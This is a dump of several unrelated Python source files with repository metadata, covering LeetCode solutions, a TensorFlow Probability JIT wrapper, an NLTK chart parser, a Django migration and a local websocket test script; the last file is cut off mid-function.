:type grid: List[List[int]]
:rtype: int
"""
m = len(grid)
if m == 0:
return 0
n = len(grid[0])
for j in range(1,n):
grid[0][j] += grid[0][j-1]
for i in range(1,m):
grid[i][0] += grid[i-1][0]
for i in range(1,m):
for j in range(1, n):
grid[i][j] = grid[i][j] + min(grid[i-1][j], grid[i][j-1])
return grid[-1][-1]
if __name__ == '__main__':
obj = Solution()
while True:
m = int(input())
grid = []
for i in range(m):
nums_str = input().strip().split()
nums = list(map(int, nums_str))
grid.append(nums)
res = obj.minPathSum(grid)
print(res)
| [
"czy36mengfei@163.com"
] | czy36mengfei@163.com |
0da170eeb4c9c974c1cd842b20ba915ea9ff5e14 | b26c41926fa3a7c2c061132d80e91a2750f2f468 | /tensorflow_probability/python/experimental/util/jit_public_methods.py | 927285368770ee307c5f7c058aa83b3846574dff | [
"Apache-2.0"
] | permissive | tensorflow/probability | 22e679a4a883e408f8ef237cda56e3e3dfa42b17 | 42a64ba0d9e0973b1707fcd9b8bd8d14b2d4e3e5 | refs/heads/main | 2023-09-04T02:06:08.174935 | 2023-08-31T20:30:00 | 2023-08-31T20:31:33 | 108,053,674 | 4,055 | 1,269 | Apache-2.0 | 2023-09-13T21:49:49 | 2017-10-23T23:50:54 | Jupyter Notebook | UTF-8 | Python | false | false | 5,174 | py | # Copyright 2021 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A wrapper to XLA-compile an object's public methods."""
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.distributions import distribution as distribution_lib
from tensorflow_probability.python.distributions import kullback_leibler
__all__ = [
'DEFAULT_METHODS_EXCLUDED_FROM_JIT',
'JitPublicMethods'
]
JAX_MODE = False
NUMPY_MODE = False
DEFAULT_METHODS_EXCLUDED_FROM_JIT = (
# tfd.Distribution
'event_shape',
'event_shape_tensor',
'batch_shape',
'batch_shape_tensor',
'dtype',
'kl_divergence', # Wrapping applied explicitly in `_traced_kl_divergence`.
'experimental_default_event_space_bijector',
'experimental_local_measure',
# tfb.Bijector
# TODO(davmre): Test wrapping bijectors.
'forward_event_shape',
'forward_event_shape_tensor',
'inverse_event_shape',
'inverse_event_shape_tensor',
'forward_dtype',
'inverse_dtype',
'forward_event_ndims',
'inverse_event_ndims',
'experimental_compute_density_correction',
)
if NUMPY_MODE:
JitPublicMethods = lambda f, trace_only=False: f
else:
class JitPublicMethods(object):
"""Wrapper to compile an object's public methods using XLA."""
def __init__(self,
object_to_wrap,
trace_only=False,
methods_to_exclude=DEFAULT_METHODS_EXCLUDED_FROM_JIT):
"""Wraps an object's public methods using `tf.function`/`jax.jit`.
Args:
object_to_wrap: Any Python object; for example, a
`tfd.Distribution` instance.
trace_only: Python `bool`; if `True`, the object's methods are
not compiled, but only traced with `tf.function(jit_compile=False)`.
This is only valid in the TensorFlow backend; in JAX, passing
`trace_only=True` will raise an exception.
Default value: `False`.
methods_to_exclude: List of Python `str` method names not to wrap.
For example, these may include methods that do not take or return
Tensor values. By default, a number of `tfd.Distribution` and
`tfb.Bijector` methods and properties are excluded (e.g.,
`event_shape`, `batch_shape`, `dtype`, etc.).
Default value:
tfp.experimental.util.DEFAULT_METHODS_EXCLUDED_FROM_JIT`
"""
self._object_to_wrap = object_to_wrap
self._methods_to_exclude = methods_to_exclude
self._trace_only = trace_only
@property
def methods_to_exclude(self):
return self._methods_to_exclude
@property
def trace_only(self):
return self._trace_only
@property
def object_to_wrap(self):
return self._object_to_wrap
def copy(self, **kwargs):
return type(self)(self.object_to_wrap.copy(**kwargs),
trace_only=self.trace_only,
methods_to_exclude=self.methods_to_exclude)
def __getitem__(self, slices):
return type(self)(self.object_to_wrap[slices],
trace_only=self.trace_only,
methods_to_exclude=self.methods_to_exclude)
def __getattr__(self, name):
# Note: this method is called only as a fallback if an attribute isn't
# otherwise set.
if name == 'object_to_wrap':
# Avoid triggering an infinite loop if __init__ hasn't run yet.
raise AttributeError()
attr = getattr(self.object_to_wrap, name)
if callable(attr):
if not (name.startswith('_') or name in self.methods_to_exclude):
# On the first call to a method, wrap it, and store the wrapped
# function to be reused by future calls.
attr = tf.function(autograph=False,
jit_compile=not self.trace_only)(attr)
setattr(self, name, attr)
return attr
@kullback_leibler.RegisterKL(JitPublicMethods, distribution_lib.Distribution)
@kullback_leibler.RegisterKL(distribution_lib.Distribution, JitPublicMethods)
@kullback_leibler.RegisterKL(JitPublicMethods, JitPublicMethods)
def _compiled_kl_divergence(d1, d2, name=None):
"""Compiled KL divergence between two distributions."""
trace_only = True
if isinstance(d1, JitPublicMethods):
trace_only &= d1.trace_only
d1 = d1.object_to_wrap
if isinstance(d2, JitPublicMethods):
trace_only &= d2.trace_only
d2 = d2.object_to_wrap
return tf.function(autograph=False, jit_compile=not trace_only)(
d1.kl_divergence)(d2, name=name)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
8e9e7723d0d08bab41f6b2e74af3f118ff5cb2e3 | 53e90091d10a2454e14a02ecc689e355ac2a7cc1 | /book3/pylisting/code_wfst.py | e3d6c5128b16804c82c340c83396238548917d71 | [] | no_license | dougalg/nltk.github.com | aac74cf03d17475adc177ac08691359cb1f4adb6 | 9a04ac5264f5ef08d87d6b920580c9160042f1a0 | refs/heads/master | 2020-12-07T17:15:15.894232 | 2014-04-21T14:11:17 | 2014-04-21T14:11:17 | 18,965,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py | # Natural Language Toolkit: code_wfst
def init_wfst(tokens, grammar):
numtokens = len(tokens)
wfst = [[None for i in range(numtokens+1)] for j in range(numtokens+1)]
for i in range(numtokens):
productions = grammar.productions(rhs=tokens[i])
wfst[i][i+1] = productions[0].lhs()
return wfst
def complete_wfst(wfst, tokens, grammar, trace=False):
index = dict((p.rhs(), p.lhs()) for p in grammar.productions())
numtokens = len(tokens)
for span in range(2, numtokens+1):
for start in range(numtokens+1-span):
end = start + span
for mid in range(start+1, end):
nt1, nt2 = wfst[start][mid], wfst[mid][end]
if nt1 and nt2 and (nt1,nt2) in index:
wfst[start][end] = index[(nt1,nt2)]
if trace:
print("[%s] %3s [%s] %3s [%s] ==> [%s] %3s [%s]" % \
(start, nt1, mid, nt2, end, start, index[(nt1,nt2)], end))
return wfst
def display(wfst, tokens):
print('\nWFST ' + ' '.join([("%-4d" % i) for i in range(1, len(wfst))]))
for i in range(len(wfst)-1):
print("%d " % i, end=" ")
for j in range(1, len(wfst)):
print("%-4s" % (wfst[i][j] or '.'), end=" ")
print()
| [
"stevenbird1@gmail.com"
] | stevenbird1@gmail.com |
c413c0507a2af69c905edbbce39795ea9ae12c2d | c9000e5e30825b29febbefa5ad00da1f57551f8e | /04/zhumeichao/Login.py | b425be01877d8e9766d6f68f886054ccc3d22165 | [] | no_license | xiaotian1991/actual-10-homework | 81c58b24f58fc87e4890f1475ad83de8b66ee53b | 0b379ca6189f843f121df4db5814c83262f9981a | refs/heads/master | 2021-06-12T23:35:52.954510 | 2017-03-24T07:41:18 | 2017-03-24T07:41:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #!/usr/bin/env python
#encoding=utf-8
import Usermod
num=raw_input("<登陆1> <注册2>\n 请输入操作数字:")
if num == '1':
userinfo=Usermod.userlist("user.txt")
Usermod.userlogin(userinfo)
elif num == '2':
userinfo=Usermod.userlist("user.txt")
Usermod.adduser(userinfo,"user.txt")
else:
print "PS:\t输入数字1 ->登陆\n\t输入数字2 ->注册"
| [
"shengxinjing@addnewer.com"
] | shengxinjing@addnewer.com |
2f468e02b23ded4932329802f1f8dbd8609875d0 | 17f1811abda6c828460b77f460671f9c2f464204 | /leetcode/duplicates_list.py | ce3849e0269c3d72f27886e3afb9af07c0d8ac5a | [] | no_license | rishabhranawat/challenge | f10f69fc30881a0571c4321b466a89aeeb06e568 | e836343be5185f8843bb77197fccff250e9a77e3 | refs/heads/master | 2021-01-21T15:13:47.590675 | 2020-04-25T15:26:42 | 2020-04-25T15:26:42 | 91,833,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Problem Source: LeetCode
# Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array),
# some elements appear twice and others appear once.
# Find all the elements that appear twice in this array.
# Could you do it without extra space and in O(n) runtime?
# Example:
# Input:
# [4,3,2,7,8,2,3,1]
# Output:
# [2,3]
### ### ###
def findDuplicates(nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
nums = sorted(nums)
first = 0
second = 1
twice = []
while(second < len(nums)):
if(nums[first] == nums[second]):
twice.append(nums[second])
first += 2
second += 2
else:
first += 1
second += 1
return(twice)
print(findDuplicates([4,3,2,7,8,2,3,1])) | [
"rishabhranawat12345@gmail.com"
] | rishabhranawat12345@gmail.com |
63755929f03cbc64d858991d90397a001ce08a5b | 1b0846fddb7c1e8c09e080db40dca9a9590a2519 | /news_scrap/migrations/0005_auto_20180806_0954.py | e7b63894612a3e74bc3b7d6d63fbee799f71a2e0 | [] | no_license | Serdiuk-Roman/self-written_project | 3d657982e95112fa1031241a8f8e2ee138533450 | 3aa0e733173871c2da692deb1a9346e635f90e75 | refs/heads/master | 2022-12-11T11:25:59.841042 | 2018-08-07T19:53:01 | 2018-08-07T19:53:01 | 143,103,670 | 0 | 0 | null | 2022-12-08T02:19:51 | 2018-08-01T04:25:21 | Python | UTF-8 | Python | false | false | 392 | py | # Generated by Django 2.0.7 on 2018-08-06 09:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news_scrap', '0004_auto_20180627_0759'),
]
operations = [
migrations.AlterField(
model_name='shortnews',
name='news_link',
field=models.URLField(unique=True),
),
]
| [
"serdiuk.r@gmail.com"
] | serdiuk.r@gmail.com |
8385accd5777109597a2d31c8effe9b4dffa447a | 42229d7c76c305cfde63659ad715a4e6bef0ea99 | /goods/test/class_inside_distance.py | 20bc5d36fc8d67eb626ddc098a24d94d68ce79a3 | [] | no_license | LRJliurj/GoodsServer | 4a043d2f1195e4793aad327732201375495a88f9 | c8c1bbda4fa4ba2a0e8a4055a67b7278ddb15b03 | refs/heads/master | 2020-07-05T14:03:58.536658 | 2019-09-24T03:01:53 | 2019-09-24T03:01:53 | 202,668,466 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | __author__ = 'admin'
# *_*coding:utf-8 *_*
import numpy as np
import os
from goods.util import distance_util
#计算单个商品类内差异值
def inside_distance(img_feature_path,img_dis_path):
img_features = {}
with open(img_feature_path,'r') as f:
lines = f.readlines()
for line in lines:
feature = line.split(",")
filename = feature[0]
feature = feature[1:]
feat = []
for fea in feature:
feat.append(float(fea))
img_features[filename] = feat
img_dis={}
for img_feature1 in img_features:
for img_feature2 in img_features:
print (len(img_features[img_feature1]))
print(len(img_features[img_feature2]))
dis = distance_util.pcos(img_features[img_feature1],img_features[img_feature2])
img_dis[img_feature1+"---"+img_feature2] = dis
print (img_feature1+"---"+img_feature2,str(dis))
a = sorted(img_dis.items(), key=lambda x: x[1], reverse=True)
print (a)
with open(img_dis_path,'w') as f:
for key in a:
f.write(key[0]+","+str(float(key[1])))
f.write("\n")
if __name__=='__main__':
# 布雷柯蒂斯距离
img_feature_path = "E:\\opt\\data\\feature_top\\69024894.txt"
img_dis_path = "E:\\opt\\data\\feature_top\\step2_inside_cos\\69024894.txt"
inside_distance(img_feature_path,img_dis_path)
| [
"908601417@qq.com"
] | 908601417@qq.com |
937536e97205603aaafc55317b87850a6abf7d9e | 54f395d77fd98fce2e42f9883953118a4cd74cf8 | /test/socket_overload.py | 96ca82600e39f9deba4e315164d0ed83b6752451 | [] | no_license | zdimon/angular-chat | bfdaa0cb5861da03764402202179711edb92c131 | 483ddf675e8c6233b3a0642b9aa86fe058ef9e44 | refs/heads/master | 2020-04-06T05:30:52.957098 | 2017-01-31T12:12:00 | 2017-01-31T12:12:00 | 39,195,268 | 0 | 1 | null | 2015-09-08T13:27:47 | 2015-07-16T12:21:08 | Python | UTF-8 | Python | false | false | 1,090 | py | import websocket
from websocket import create_connection
import logging
import json
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '../djapp'))
import brukva
bclient = brukva.Client()
bclient.connect()
import time
def test_brukva():
mes = { 'action': 'close_room' }
print 'send to test_test'
for i in range(1000000):
bclient.publish('test_test', json.dumps(mes))
def test():
def on_message(ws, message):
print message
def on_error(ws, error):
#print error
print 'errrrrr'
def on_close(ws):
print "### closed ###"
def on_open(ws):
print 'start serve'
data = { 'action': 'connect', 'tpa': 'test', 'user_id': '150032', 'source': 'site' }
ws.send(json.dumps(data))
ws = websocket.WebSocketApp("ws://localhost:8889/ws",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.on_open = on_open
ws.run_forever()
ws.close()
if __name__ == '__main__':
test()
import sys
sys.exit("quit")
| [
"zdimon77@gmail.com"
] | zdimon77@gmail.com |
3c89317045ceea3ccaeb459a84d66c919258d4ca | 4e02d5b0b1b0739553fd40bbbdfb0d02c9830350 | /0387_First_Unique_Character_in_a_String.py | 5434e1b8da203b3a94bc89b9f30006df155d5acb | [] | no_license | bingli8802/leetcode | b039ab6af62f0c8992463393f561caafd21056e6 | a509b383a42f54313970168d9faa11f088f18708 | refs/heads/master | 2023-03-29T03:11:45.801090 | 2021-03-23T22:55:16 | 2021-03-23T22:55:16 | 279,321,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class Solution(object):
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
if not s:
return -1
res = float('inf')
dic = defaultdict(list)
for i, v in enumerate(s):
dic[v].append(i)
for val in dic.values():
if len(val) == 1:
res = min(res, val[0])
if res == float('inf'):
return -1
else:
return res
# if index are the same
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
for i in s:
if s.find(i) == s.rfind(i):
return s.find(i)
return -1
| [
"noreply@github.com"
] | bingli8802.noreply@github.com |
ca1f2f962c2c3961e8d6261325d768ab71aad657 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_136/1267.py | f52e8c78ada28936bf0480feb093bd78584889c3 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | #!/usr/bin/env python
# vim: set filetype=python et sw=4 ts=4:
import sys
sys.setrecursionlimit(1024*1024)
T = int(sys.stdin.readline())
def seconds_to_reach(target, rate):
return target/rate
def solve(C, F, X, rate):
seconds_if_buy = seconds_to_reach(C, rate) + seconds_to_reach(X, rate+F)
seconds_if_wait = seconds_to_reach(X, rate)
if (seconds_if_buy < seconds_if_wait):
seconds = seconds_to_reach(C, rate) + solve(C, F, X, rate+F)
else:
seconds = seconds_if_wait
return seconds
for case in xrange(T):
C, F, X = [float(x) for x in sys.stdin.readline().split()]
sys.stdout.write("Case #%d: %.7f" % (case + 1, solve(C, F, X, 2.0)))
sys.stdout.write("\n")
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
163b4a862ee387590032965b8fa924cb93c8285d | c68c841c67f03ab8794027ff8d64d29356e21bf1 | /Two Sum.py | 3abbd4c8b7c4aa74e47f5b64b07dc156c8fd010a | [] | no_license | jke-zq/my_lintcode | 430e482bae5b18b59eb0e9b5b577606e93c4c961 | 64ce451a7f7be9ec42474f0b1164243838077a6f | refs/heads/master | 2020-05-21T20:29:11.236967 | 2018-06-14T15:14:55 | 2018-06-14T15:14:55 | 37,583,264 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,182 | py | class Solution:
"""
@param numbers : An array of Integer
@param target : target = numbers[index1] + numbers[index2]
@return : [index1 + 1, index2 + 1] (index1 < index2)
"""
def twoSum(self, numbers, target):
# write your code here
# if not numbers:
# return []
# sortedList = []
# for i, n in enumerate(numbers):
# sortedList.append((n, i))
# sortedList.sort()
# length = len(numbers)
# left, right = 0, length - 1
# while left < right:
# total = sortedList[left][0] + sortedList[right][0]
# if total > target:
# right -= 1
# elif total < target:
# left += 1
# else:
# return sorted([sortedList[left][1] + 1, sortedList[right][1] + 1])
# left += 1
# right -= 1
hashVal = {}
length = len(numbers)
for i in range(length):
if target - numbers[i] in hashVal:
return [hashVal[target - numbers[i]], i + 1]
hashVal[numbers[i]] = i + 1
return [-1, -1] | [
"jke0zq@gmail.com"
] | jke0zq@gmail.com |
330d730d2bb745c574dbbb58a796b26d37a5afcb | 92e6f33a01b8f9e1e3b4914c67fbd6789a6abaac | /pygenic/backend/Backend.py | d9df99f5aaa80256e399441ad091bf558aad567c | [] | no_license | daeken/pygenic | 9a4b5b31eeca53b228999508d4f19bf56808cfaf | 8878a8bfdfb823a9143548a1de8e19c15c62523d | refs/heads/master | 2021-01-17T16:09:30.498552 | 2016-07-28T03:45:43 | 2016-07-28T03:45:43 | 61,535,924 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | from pygenic import *
class Backend(object):
backends = {}
@staticmethod
def register(cls):
Backend.backends[cls.__name__.lower()] = cls
return cls
ws = '\t'
def __init__(self, hexLiterals=True):
self.temp_i = 0
self.hexLiterals = hexLiterals
def tempname(self, prefix='temp'):
self.temp_i += 1
return '__%s_%i' % (prefix, self.temp_i)
def generate(self, node):
if isinstance(node, Node):
self.output = ''
self.indentation = 0
self.generate(node.sexp(byName=True))
return self.output
elif not isinstance(node, tuple):
return self.Value(node)
return getattr(self, node[0])(*node[1:])
def passthru(self, *args):
for arg in args:
ret = self.generate(arg)
if ret is not None:
self.emit(ret)
Module = passthru
| [
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
80a9a0385609f6092de63c881530a49feb80b62d | 09fd456a6552f42c124c148978289fae1af2d5c3 | /LinkedList/21.py | bbf74d969562ffdc2b3217be6edda17bdc828f3b | [] | no_license | hoang-ng/LeetCode | 60b4e68cbcf54cbe763d1f98a70f52e628ab32fb | 5407c6d858bfa43325363503c31134e560522be3 | refs/heads/master | 2021-04-10T11:34:35.310374 | 2020-07-28T10:22:05 | 2020-07-28T10:22:05 | 248,932,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | # 21. Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
# Example:
# Input: 1->2->4, 1->3->4
# Output: 1->1->2->3->4->4
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def mergeTwoLists(self, l1, l2):
if l1 == None:
return l2
if l2 == None:
return l1
dummy = ListNode(0)
current = dummy
while l1 != None and l2 != None:
if l1.val < l2.val:
current.next = l1
l1 = l1.next
else:
current.next = l2
l2 = l2.next
current = current.next
if l1 != None:
current.next = l1
if l2 != None:
current.next = l2
return dummy.next
def mergeTwoLists2(self, l1, l2):
if l1 == None:
return l2
if l2 == None:
return l1
if l1.val < l2.val:
l1.next = self.mergeTwoLists2(l1.next, l2)
return l1
else:
l2.next = self.mergeTwoLists2(l1, l2.next)
return l2 | [
"hoang2109@gmail.com"
] | hoang2109@gmail.com |
9e3718eabb1635e6485630419714c693a7599cdd | 705c2cf0ae1f38efb2340a056b0e78f89f83ec5e | /security_checks/mplcursors_interactive.py | a5758e070897d880410b40de7b7bbeebf9c67b42 | [] | no_license | Vital-Fernandez/vital_tests | 42fad619841d4b57c5ab419e6f58eef523ff8566 | ee8dbc9c09e433f91e78f9ea16977a9e5a44be6c | refs/heads/master | 2023-09-01T21:27:32.160440 | 2023-08-21T20:51:59 | 2023-08-21T20:51:59 | 235,336,802 | 0 | 1 | null | 2022-10-19T08:52:42 | 2020-01-21T12:24:57 | Python | UTF-8 | Python | false | false | 978 | py | # import numpy as np
# import matplotlib.pyplot as plt
# import mplcursors
#
# x = np.linspace(0, 10, 100)
#
# fig, ax = plt.subplots()
# ax.set_title("Click on a line to display its label")
#
# # Plot a series of lines with increasing slopes.
# for i in range(1, 20):
# ax.plot(x, i * x, label=f"$y = {i}x$")
#
# # Use a Cursor to interactively display the label for a selected line.
# mplcursors.cursor().connect(
# "add", lambda sel: sel.annotation.set_text(sel.artist.get_label()))
#
# plt.show()
import matplotlib.pyplot as plt
import numpy as np
import mplcursors
data = np.outer(range(10), range(1, 5))
fig, ax = plt.subplots()
# lines = ax.plot(data)
# ax.set_title("Click somewhere on a line.\nRight-click to deselect.\n"
# "Annotations can be dragged.")
lines = ax.plot(range(3), range(3), "o")
labels = ["a", "b", "c"]
cursor = mplcursors.cursor(lines)
cursor.connect("add", lambda sel: sel.annotation.set_text(labels[sel.index]))
plt.show() | [
"vital.fernandez@gmail.com"
] | vital.fernandez@gmail.com |
78970072af6b04d0d5817dcb82a22a137e0cf694 | 387400d70932b7b65f0ad0e24cb8290a8ce6ed46 | /August_18/129. Sum Root to Leaf Numbers.py | 01bbb2666f4a9e0dc162a013afb5256eadefec2e | [] | no_license | insigh/Leetcode | 0678fc3074b6294e8369756900fff32c7ce4e311 | 29113d64155b152017fa0a98e6038323d1e8b8eb | refs/heads/master | 2021-01-20T07:51:21.051366 | 2018-09-17T13:33:15 | 2018-09-17T13:33:15 | 90,051,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | """
Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.
An example is the root-to-leaf path 1->2->3 which represents the number 123.
Find the total sum of all root-to-leaf numbers.
Note: A leaf is a node with no children.
Example:
Input: [1,2,3]
1
/ \
2 3
Output: 25
Explanation:
The root-to-leaf path 1->2 represents the number 12.
The root-to-leaf path 1->3 represents the number 13.
Therefore, sum = 12 + 13 = 25.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sumNumbers(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return 0
self.res = []
self.dfs(root, '')
self.res = list(map(int, self.res))
return sum(self.res)
def dfs(self, node, temp):
if not node.left and not node.right:
self.res.append(temp + str(node.val))
# return
else:
if node.left:
self.dfs(node.left, temp + str(node.val))
if node.right:
self.dfs(node.right, temp + str(node.val))
| [
"zhangchaojie@ruc.edu.cn"
] | zhangchaojie@ruc.edu.cn |
29d251ed2774013737c30b03ac4211fbb47f0035 | 540789545998547d8f7d2732a8f2e9ffafcb4a93 | /bigml/laminar/math_ops.py | 0c39c5c0d9e95d5ba9041a77e1edcc9838515998 | [
"Apache-2.0"
] | permissive | davidifeoluwa/python | 801453adcc99a4eb0b92ef385ec20fa96f272f64 | b5dc03a4c695144250994261813bf39799a8c325 | refs/heads/master | 2020-03-11T04:01:21.906660 | 2018-04-03T16:26:49 | 2018-04-03T16:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,477 | py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2017-2018 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Activation functions and helpers in pure python
"""
import math
from bigml.laminar.constants import LARGE_EXP
def broadcast(fn):
def broadcaster(xs):
if len(xs) == 0:
return []
elif isinstance(xs[0], list):
return [fn(xvec) for xvec in xs]
else:
return fn(xs)
return broadcaster
def plus(mat, vec):
return [[r + v for r, v in zip(row, vec)] for row in mat]
def minus(mat, vec):
return [[r - v for r, v in zip(row, vec)] for row in mat]
def times(mat, vec):
return [[r * v for r, v in zip(row, vec)] for row in mat]
def divide(mat, vec):
return [[r / v for r, v in zip(row, vec)] for row in mat]
def dot(mat1, mat2):
out_mat = []
for row1 in mat1:
new_row = [sum(m1 * m2 for m1, m2 in zip(row1, row2)) for row2 in mat2]
out_mat.append(new_row)
return out_mat
def batch_norm(X, mean, stdev, shift, scale):
norm_vals = divide(minus(X, mean), stdev)
return plus(times(norm_vals, scale), shift)
def sigmoid(xs):
out_vec = []
for x in xs:
if x > 0:
if x < LARGE_EXP:
ex_val = math.exp(x)
out_vec.append(ex_val / (ex_val + 1))
else:
out_vec.append(1)
else:
if -x < LARGE_EXP:
out_vec.append(1 / (1 + math.exp(-x)))
else:
out_vec.append(0)
return out_vec
def softplus(xs):
return [math.log(math.exp(x) + 1) if x < LARGE_EXP else x for x in xs]
def softmax(xs):
xmax = max(xs)
exps = [math.exp(x - xmax) for x in xs]
sumex = sum(exps)
return [ex / sumex for ex in exps]
ACTIVATORS = {
'tanh': broadcast(lambda xs: [math.tanh(x) for x in xs]),
'sigmoid': broadcast(sigmoid),
'softplus': broadcast(softplus),
'relu': broadcast(lambda xs: [x if x > 0 else 0 for x in xs]),
'softmax': broadcast(softmax),
'identity': broadcast(lambda xs: [float(x) for x in xs])
}
def init_layers(layers):
return [dict(layer) for layer in layers]
def destandardize(vec, v_mean, v_stdev):
return [[v[0] * v_stdev + v_mean] for v in vec]
def to_width(mat, width):
if width > len(mat[0]):
ntiles = int(math.ceil(width / float(len(mat[0]))))
else:
ntiles = 1
output = [(row * ntiles)[:width] for row in mat]
return output
def add_residuals(residuals, identities):
to_add = to_width(identities, len(residuals[0]))
assert len(to_add[0]) == len(residuals[0])
return [[r + v for r, v in zip(rrow, vrow)]
for rrow, vrow in zip(residuals, to_add)]
def propagate(x_in, layers):
last_X = identities = x_in
for layer in layers:
w = layer['weights']
m = layer['mean']
s = layer['stdev']
b = layer['offset']
g = layer['scale']
afn = layer['activation_function']
X_dot_w = dot(last_X, w)
if m is not None and s is not None:
next_in = batch_norm(X_dot_w, m, s, b, g)
else:
next_in = plus(X_dot_w, b)
if layer['residuals']:
next_in = add_residuals(next_in, identities)
last_X = ACTIVATORS[afn](next_in)
identities = last_X
else:
last_X = ACTIVATORS[afn](next_in)
return last_X
def sum_and_normalize(youts, is_regression):
ysums = []
for i, row in enumerate(youts[0]):
sum_row = []
for j, _ in enumerate(row):
sum_row.append(sum([yout[i][j] for yout in youts]))
ysums.append(sum_row)
out_dist = []
if is_regression:
for ysum in ysums:
out_dist.append([ysum[0] / len(youts)])
else:
for ysum in ysums:
rowsum = sum(ysum)
out_dist.append([y / rowsum for y in ysum])
return out_dist
| [
"merce@bigml.com"
] | merce@bigml.com |
76d9ff4eb111325342e02d42d3862b6329453016 | 06919b9fd117fce042375fbd51d7de6bb9ae14fc | /py/tests/problems/linkedlist/loop_detect_test.py | 0120bef7fddaf215a3f2ca32b984123bbf69953c | [
"MIT"
] | permissive | bmoretz/Daily-Coding-Problem | 0caf2465579e81996869ee3d2c13c9ad5f87aa8f | f79e062e9f6e7b18b7e95c071fbe71ad104affcb | refs/heads/master | 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 | MIT | 2022-11-22T09:20:23 | 2019-12-06T17:17:00 | C++ | UTF-8 | Python | false | false | 1,243 | py | import unittest
from dcp.problems.linkedlist.node import build_ref_list
from dcp.problems.linkedlist.loop_detect import detect_loop1
class Test_DetectLoop1(unittest.TestCase):
@staticmethod
def set_loop(node, loop_back):
loop_node, prev = None, None
while node != None:
if node.data == loop_back:
loop_node = node
prev = node
node = node.next
prev.next = loop_node
def setUp(self):
pass
def test_case1(self):
assert detect_loop1(None) == None
def test_case2(self):
node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
self.set_loop(node, 'C')
actual = detect_loop1(node).data
expected = 'C'
assert actual == expected
def test_case3(self):
node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
self.set_loop(node, 'A')
actual = detect_loop1(node).data
expected = 'A'
assert actual == expected
def test_case4(self):
node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
self.set_loop(node, 'D')
actual = detect_loop1(node).data
expected = 'D'
assert actual == expected | [
"bmoretz@ionicsolutions.net"
] | bmoretz@ionicsolutions.net |
37803d71ba2811fec39a1deeee753f4bdc6deb73 | 4a869982cc4cc99d83df18465f545e51c97aeb37 | /.history/Baseline/ma-course-subjectivity-mining/pynlp/ml_pipeline/pipelines_20201015124127.py | 40b408e13f354ddad6524fd6ce7574e836258622 | [] | no_license | SorenKF/emotional_sm | 09d367421782d8c83987fb99be258b1b30c4ce8d | 63d51103f7511b19a83dec668327fcc7ea4a7f39 | refs/heads/main | 2023-02-03T14:12:14.572581 | 2023-01-24T18:06:52 | 2023-01-24T18:06:52 | 301,679,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,492 | py | from sklearn.pipeline import Pipeline, FeatureUnion
from ml_pipeline import preprocessing, representation
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
def pipeline(preprocessor, representation, classifier):
return Pipeline([('prep', preprocessor),
('frm', representation),
('clf', classifier)])
def combined_pipeline(prep1, repr1, prep2, repr2, classifier):
combined_features = FeatureUnion([
('token_features', Pipeline([('prep1', prep1), ('repr1', repr1)])),
('polarity_features', Pipeline([('prep2', prep2), ('repr2', repr2)]))])
return Pipeline([('features', combined_features),
('clf', classifier)])
# ------------- parametrization ---------------------------
def svm_clf_grid_parameters():
"""Example parameters for svm.LinearSVC grid search
